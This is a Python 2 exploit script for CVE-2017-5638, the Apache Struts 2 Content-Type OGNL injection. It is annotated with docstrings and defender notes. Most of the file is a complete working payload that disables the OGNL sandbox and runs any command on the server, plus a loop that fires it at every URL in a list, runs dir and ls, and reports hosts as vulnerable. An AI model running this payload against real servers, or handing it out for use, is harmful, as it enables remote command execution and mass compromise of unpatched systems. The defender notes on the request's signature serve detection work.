# CVE-2017-5638
#
# Apache Struts 2.0 RCE vulnerability
#
# A script to exploit CVE-2017-5638, which allows an attacker to inject OS commands
# into a web application through the Content-Type header
#
# Author: Harish Tiwari
# Email: harish@payatu.com
# Website: http://www.payatu.com
# Copyright (c) 2017-2027
# License: GPL V3
# Create a file named urls.txt in the same directory containing all the URLs to be tested, one per line
#! /usr/bin/python -tt
import urllib2
import httplib
def exploit(url, cmd):
    """Send one HTTP request whose Content-Type header carries an OGNL expression.

    This is the CVE-2017-5638 probe: an unpatched Struts 2 multipart parser
    evaluates the malformed Content-Type value instead of rejecting it, so
    the expression runs ``cmd`` on the server and streams its output into
    the HTTP response body.

    Args:
        url: Target URL. No request body is sent, so urllib2 issues a GET.
        cmd: Command string that is interpolated into the expression as-is.

    Returns:
        The response body as a str when the request completes, otherwise the
        caught exception object itself (see the except branch below) -- callers
        that do substring tests on the result will raise TypeError in that case.

    Defender notes: a Content-Type value beginning with ``%{`` (rather than a
    media type) is the observable signature of this request at the proxy or
    WAF; Struts releases that fix this CVE refuse such values before any
    evaluation, and a patched server returns an ordinary error response.
    """
    # Expression header: the value is opened as an OGNL block whose first
    # assignment still looks like a multipart media type.
    payload = "%{(#_='multipart/form-data')."
    # These statements disable the OGNL member-access sandbox and clear the
    # excluded class/package lists, which is what turns expression
    # evaluation into arbitrary method invocation.
    payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
    payload += "(#_memberAccess?"
    payload += "(#_memberAccess=#dm):"
    payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
    payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
    payload += "(#ognlUtil.getExcludedPackageNames().clear())."
    payload += "(#ognlUtil.getExcludedClasses().clear())."
    payload += "(#context.setMemberAccess(#dm))))."
    # `cmd` is spliced into a single-quoted OGNL string with no escaping.
    payload += "(#cmd='%s')." % cmd
    # Pick cmd.exe or bash from the server's os.name, then start the process
    # with stderr merged into stdout.
    payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
    payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
    payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
    payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
    # Copy the process output straight into the servlet response so the
    # caller can read it from the HTTP body.
    payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
    payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
    payload += "(#ros.flush())}"
    try:
        headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
        request = urllib2.Request(url, headers=headers)
        page = urllib2.urlopen(request).read()
    except Exception, e:
        # Any failure (connection refused, HTTP error, timeout) is returned
        # as the exception object rather than raised or converted to text.
        page = e
    return page
def main():
    """Read urls.txt and print which listed URLs answer the probe.

    Every line of urls.txt (blank lines included, after stripping) is probed
    with ``dir``; the response text is matched against fixed strings to
    classify the host as Linux (bash rejects ``dir``), Windows (``dir``
    prints a volume header), or Linux with a ``dir`` utility installed, and
    a second probe confirms the verdict before the URL is reported.

    Note: exploit() returns the exception object on any request failure, so
    the ``in output`` tests below raise TypeError for unreachable hosts
    instead of skipping them, and ``items[0]`` raises IndexError when the
    ``ls`` output is empty.
    """
    with open("urls.txt") as f:
        content = f.readlines()
    content = [x.strip() for x in content]
    for ele in content:
        output = exploit(str(ele), "dir")
        print "[*] Testing url : "+ ele + "\n"
        if "/bin/bash: dir: command not found" in output:
            # bash ran the command and rejected it: Linux without a `dir` binary.
            print ":Linux System:\n"
            output = exploit(str(ele), "ls -all")
            items = output.split()
            # GNU ls prints "total N" as the first line of a long listing.
            if items[0] == "total":
                print "[+] url " + str(ele) + " is vulnerable\n"
        elif "Volume Serial Number is" in output:
            # cmd.exe `dir` header: Windows host.
            print ":Windows System:\n"
            print "[+] url " + str(ele) + " is vulnerable\n"
        else:
            # Neither marker matched; try the GNU coreutils `dir` banner.
            output = exploit(str(ele), "dir --version")
            if "This is free software: you are free to change and redistribute it" in output:
                print ":Linux System Supporting dir utility:\n"
                print "[+] url " + str(ele) + " is vulnerable\n"
if __name__ == "__main__":
    # Script entry point; nothing runs when the module is merely imported.
    main()